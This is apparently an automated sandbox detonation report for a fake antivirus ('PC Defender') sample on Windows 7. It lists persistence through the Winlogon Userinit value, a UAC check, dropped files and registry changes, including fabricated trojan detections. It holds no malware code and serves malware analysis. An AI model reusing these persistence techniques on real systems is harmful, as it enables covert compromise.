memory/492-7-0x0000000005A80000-0x0000000005AD6000-memory.dmp

memory/492-8-0x0000000005760000-0x0000000005770000-memory.dmp

memory/492-9-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/492-10-0x0000000005760000-0x0000000005770000-memory.dmp

memory/492-11-0x0000000005760000-0x0000000005770000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

148s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\"" C:\Windows\syswow64\MsiExec.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Program Files\Internet Explorer\iexplore.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Def Group\PC Defender\hook.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIC504.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f76c19a.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76c19d.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76c19a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76c19f.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76c19d.ipi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-70-d1-5d-21-ee C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\scanSchedulerDaily = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\iexplore\Count = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\updateSchedulerDaily = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\updateSchedulerDayOfWeek = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\Found\C:\Windows\System32\more.com = "Backdoor.Win32.ProRat.gej" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\Found\C:\Windows\Fonts\arabtype.ttf = "Trojan.Win32.Llac.bia" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Suggested Sites\DataStreamEnabledState = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\Found C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Count = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7DB14485-0BDA-4E05-ABC4-CA60423FADA5}\8a-70-d1-5d-21-ee C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7DB14485-0BDA-4E05-ABC4-CA60423FADA5}\WpadNetworkName = "Network 3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Time = e807030006000200160026002300a302 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\scanSchedulerSecond = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{2916C86E-86A6-43FE-8112-43ABE6BF8DCC} {0C6C4200-C589-11D0-999A-00C04FD655E1} 0xFFFF = 010000000000000020cb685cf26cda01 C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Suggested Sites\MigrationTime = c0beb45ef26cda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow\Software\Microsoft C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\scanSchedulerDayOfWeek = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main\OperationalData = "4" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\scanSchedulerMinute = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\Found\C:\Windows\ehome\mstvcapn.dll = "Trojan.Win32.Agent.dfki" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000004000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Suggested Sites C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAO Settings\DiscardLoadTimes = 403cf55cf26cda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7DB14485-0BDA-4E05-ABC4-CA60423FADA5}\8a-70-d1-5d-21-ee C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\iexplore\Time = e807030006000200160026002300e102 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{08244EE6-92F0-47F2-9FC9-929BAA2E7235} {0C6C4200-C589-11D0-999A-00C04FD655E1} 0xFFFF = 010000000000000020cb685cf26cda01 C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\PackageName = "PCDefenderSilentSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Clients = 3a0000000000 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Net C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Media\1 = ";" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Language = "1033" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AdvertiseFlags = "388" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AdvertiseFlags = "388" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\InstanceType = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Version = "16777216" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Language = "1033" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\InstanceType = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AuthorizedLUAApp = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\ProductName = "PC Defender" C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Clients = 3a0000000000 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\ProductName = "PC Defender" C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Media\1 = ";" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\InstanceType = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AuthorizedLUAApp = "0" C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Media C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Clients = 3a0000000000 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\ProductName = "PC Defender" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Assignment = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\DeploymentFlags = "3" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\PackageCode = "18627594958587344B2B3984171915B1" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\PackageName = "PCDefenderSilentSetup.msi" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\PackageCode = "18627594958587344B2B3984171915B1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AuthorizedLUAApp = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\PackageCode = "18627594958587344B2B3984171915B1" C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\ProductName = "PC Defender" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ C:\Windows\SysWOW64\reg.exe N/A
